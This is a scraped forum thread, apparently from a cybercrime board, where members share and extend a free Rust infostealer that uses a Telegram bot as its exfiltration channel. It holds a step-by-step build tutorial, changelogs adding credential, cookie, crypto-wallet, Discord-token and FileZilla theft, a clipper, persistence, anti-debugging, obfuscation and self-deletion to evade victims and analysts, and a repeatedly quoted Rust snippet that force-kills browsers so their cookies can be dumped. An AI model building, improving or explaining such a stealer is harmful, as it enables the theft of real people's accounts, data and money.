FREE & opensrc Rust Stealer

[xkokoroot]

Спасибо брат

 

[ovadgod]

Its fine.
Everyone is here to learn.
I will make a short Tutorial on friday( Im NOT Home so i can only Support via Phone)

Already in it.

hi bro, github link was disable ,,,do you know it ? i tried to open it , it was diable already.

 

[professorx]

Krabs is the best

 

[Forwanin]

any idea how to fix this

 

[mehmetaksoyx]

As Promised here, for everyone a tutorial(With screens)
1. Download the src and unzip it.

2. Install Rustup from here. https://win.rustup.rs/x86_64
2.1 Install VS Studio and select the Desktop Development with C++ (needed for linking)
Посмотреть вложение 39076


After you installed it all, you can finally go to tg and create a bot.
3. you can open main.rs with any editor.
Now copy the bot token into Посмотреть вложение 39077

Between the " ";
It will look like this.
Посмотреть вложение 39078
Now create a Group and add your created bot.
After that get the Channel ID via https://web.telegram.org/z/
Select the group and you will see the id in the url: Example
Посмотреть вложение 39079
Now copy the whole part after the # into the CHANNEL_ID field.
It will look smth like this:

Посмотреть вложение 39080


Now you can type in a cmd or in your ide

cargo build --release

now you will find your ready stealer into target\release\

Have fun & If you need help dont be shy to contact me

For more information about this error, try `rustc --explain E0793`.
error: could not compile `ntapi` (lib) due to 2 previous errors
warning: build failed, waiting for other jobs to finish...

i have a problem like this how can i solve it

 

[PK268]

this is so nice, I really wanted to learn Rust now

 

[kokoganev]

Any PE crypter should work
Also sorry Guys for the Update delay im on a vacation right now

Most of us in this topic are waiting DoKitO to get back from his vacation

 

[Tomek]

Hello,
I have updated this cool application cuz I started to learn rust!

Here is what I have changed, my main goal was to make it safer for user, and more undetected for victim.
- Fixed compilation error.
- Generated files will automatically be deleted from temp folder (out.zip, sensfiles.zip).
- Now API, and CHANNEL ID are encrypted in XOR, just run Python script that will encrypt API, and CHANNEL ID, put encrypted strings in main.rs, and everything will be working. In this way, during static analysis, you can't find normal API, and CHANNEL ID, you can only find encrypted API, and CHANNEL ID. Ofc you can still get these strings during debugging, but in next update, I'll add detection for tools that are being used to analyze file activity including network activity, so your API, and CHANNEL ID will be even safer!

If you need any help, write below
Hope u will like it DoKitO

 

[Viper CC Checker]

спасибо тема огонь

 

[Tomek]

En?

спасибо тема огонь

 

[Viper CC Checker]

i wrote thanks the thread is fire bro

 

[deathevil]

Thanks mate, you are a king

 

[Tomek]

Another update from Tomek! Cuz I started to learn rust!

In previous update:
Here is what I have changed, my main goal was to make it safer for user, and more undetected for victim.
- Fixed compilation error.
- Generated files will automatically be deleted from temp folder (out.zip, sensfiles.zip).
- Now API, and CHANNEL ID are encrypted in XOR, just run Python script that will encrypt API, and CHANNEL ID, put encrypted strings in main.rs, and everything will be working. In this way, during static analysis, you can't find normal API, and CHANNEL ID, you can only find encrypted API, and CHANNEL ID. Ofc you can still get these strings during debugging, but in next update, I'll add detection for tools that are being used to analyze file activity, including network activity, so your API, and CHANNEL ID will be even safer!

New update:
- Added detection for running well known tools eg fiddler, dbg, etc...
- Added detection for debugging, very simple I'll add more flags later
- Changed handling of errors, if there is any error, instead just closing program, it will delete itself to remove all traces (I assume this application is not executed by victim, but by another software for payloads)

Ty coree and DrClinker for provaiding resource in this thread:

https://xss.pro/threads/94178/

If you need any help, write below. I'm happy to help

 

[DoKitO]

[Update log]
Sorry guys I must admit i was lazy & also busy

Here is a new update

Some stuff that changed
- Fixed Chrome stuff(opera and all other shit)
- Added metamask address grabber(rushed)
- Full redline format
- Improved Clipper & Added Critical Process
- Fixed Persistence
- Some other shit
- VPN & Filezilla

might release telegram gate later

 

[haxking]

I found a little mistake. It doesn't pick up cookies and wallets when the browser is running. You need to stop the browser before taking data from it.

use std::process::Command;
use std::os::windows::process::CommandExt;
use winapi::um::winbase::CREATE_NO_WINDOW;
/* ... */
fn kill_browsers() -> Vec<String> {
    let browsers = vec!["chrome.exe", "brave.exe", "edge.exe"];
    let mut killed = Vec::new();
    for browser in browsers {
        let output = Command::new("taskkill")
            .arg("/F")
            .arg("/IM")
            .arg(browser)
            .arg("/T")
            .creation_flags(CREATE_NO_WINDOW)
            .output()
            .expect("");
        if output.status.success() {
            killed.push(browser.to_string());
        }
    }
    killed
}
/* ... */

let reborn_browsers_vec = kill_browsers();
    unsafe {
        let _ = opt_browsers
        .into_iter()
        .filter_map(|v| browsers.get(v.as_str()).cloned())
        .map(|mut v| v.dump(path.clone()).map(|_| v))
        .filter_map(|v| v.ok())
        .collect::<Vec<_>>();
    }

 

[dwongz]

I found a little mistake. It doesn't pick up cookies and wallets when the browser is running. You need to stop the browser before taking data from it.

use std::process::Command;
use std::os::windows::process::CommandExt;
use winapi::um::winbase::CREATE_NO_WINDOW;
/* ... */
fn kill_browsers() -> Vec<String> {
    let browsers = vec!["chrome.exe", "brave.exe", "edge.exe"];
    let mut killed = Vec::new();
    for browser in browsers {
        let output = Command::new("taskkill")
            .arg("/F")
            .arg("/IM")
            .arg(browser)
            .arg("/T")
            .creation_flags(CREATE_NO_WINDOW)
            .output()
            .expect("");
        if output.status.success() {
            killed.push(browser.to_string());
        }
    }
    killed
}
/* ... */

let reborn_browsers_vec = kill_browsers();
    unsafe {
        let _ = opt_browsers
        .into_iter()
        .filter_map(|v| browsers.get(v.as_str()).cloned())
        .map(|mut v| v.dump(path.clone()).map(|_| v))
        .filter_map(|v| v.ok())
        .collect::<Vec<_>>();
    }

SysToolsLib/PowerShell/ShadowCopy.ps1 at master · JFLarvoire/SysToolsLib (github.com)

Method for copy cookies.db file without kill browser.

Am not pro Rust Anyone can handle for Rust?

 

[Tomek]

I found a little mistake. It doesn't pick up cookies and wallets when the browser is running. You need to stop the browser before taking data from it.

use std::process::Command;
use std::os::windows::process::CommandExt;
use winapi::um::winbase::CREATE_NO_WINDOW;
/* ... */
fn kill_browsers() -> Vec<String> {
    let browsers = vec!["chrome.exe", "brave.exe", "edge.exe"];
    let mut killed = Vec::new();
    for browser in browsers {
        let output = Command::new("taskkill")
            .arg("/F")
            .arg("/IM")
            .arg(browser)
            .arg("/T")
            .creation_flags(CREATE_NO_WINDOW)
            .output()
            .expect("");
        if output.status.success() {
            killed.push(browser.to_string());
        }
    }
    killed
}
/* ... */

let reborn_browsers_vec = kill_browsers();
    unsafe {
        let _ = opt_browsers
        .into_iter()
        .filter_map(|v| browsers.get(v.as_str()).cloned())
        .map(|mut v| v.dump(path.clone()).map(|_| v))
        .filter_map(|v| v.ok())
        .collect::<Vec<_>>();
    }

This is not good idea, I had similar idea but it wasn't working all time. Btw there will be new update with a lot of features! DoKitO told me he will check this bug This cookies stealer is probably the most important part of this stealer imo.
The finest new stuff from this list, are filezilla stealer + discord token stealer

 

[Tomek]

New UPADTE:
So far, the following tasks have been completed:

• Removing out.zip and sensfiles.zip from the temp directory
• Obfuscated everything in Chromium folder
• Fixed FileZilla
• Fixed Uplay
• Removed Steam
• Added Discord Token Grabber
• Added full Obfuscation for Telegram Strings (Without any python encryption etc...)
• Added Anti-Analysis function

Known issues:

• Cookie dumper for chromium is not working always
• Missing obfuscation in strings

From now @DoKit0 will also add new things to this version so there will be always one version of the best rust stealer!

 

[Tomek]

Small update!
- More info about stolen things e.g. Discord Tokens, Servers FTP/SSH, Others
- More flags for detecting debugging
- Other simple changes

Preview:

Known issues:
- Cookie dumper for chromium is not working always
- Missing obfuscation in strings

 

[Голиа]

very nice software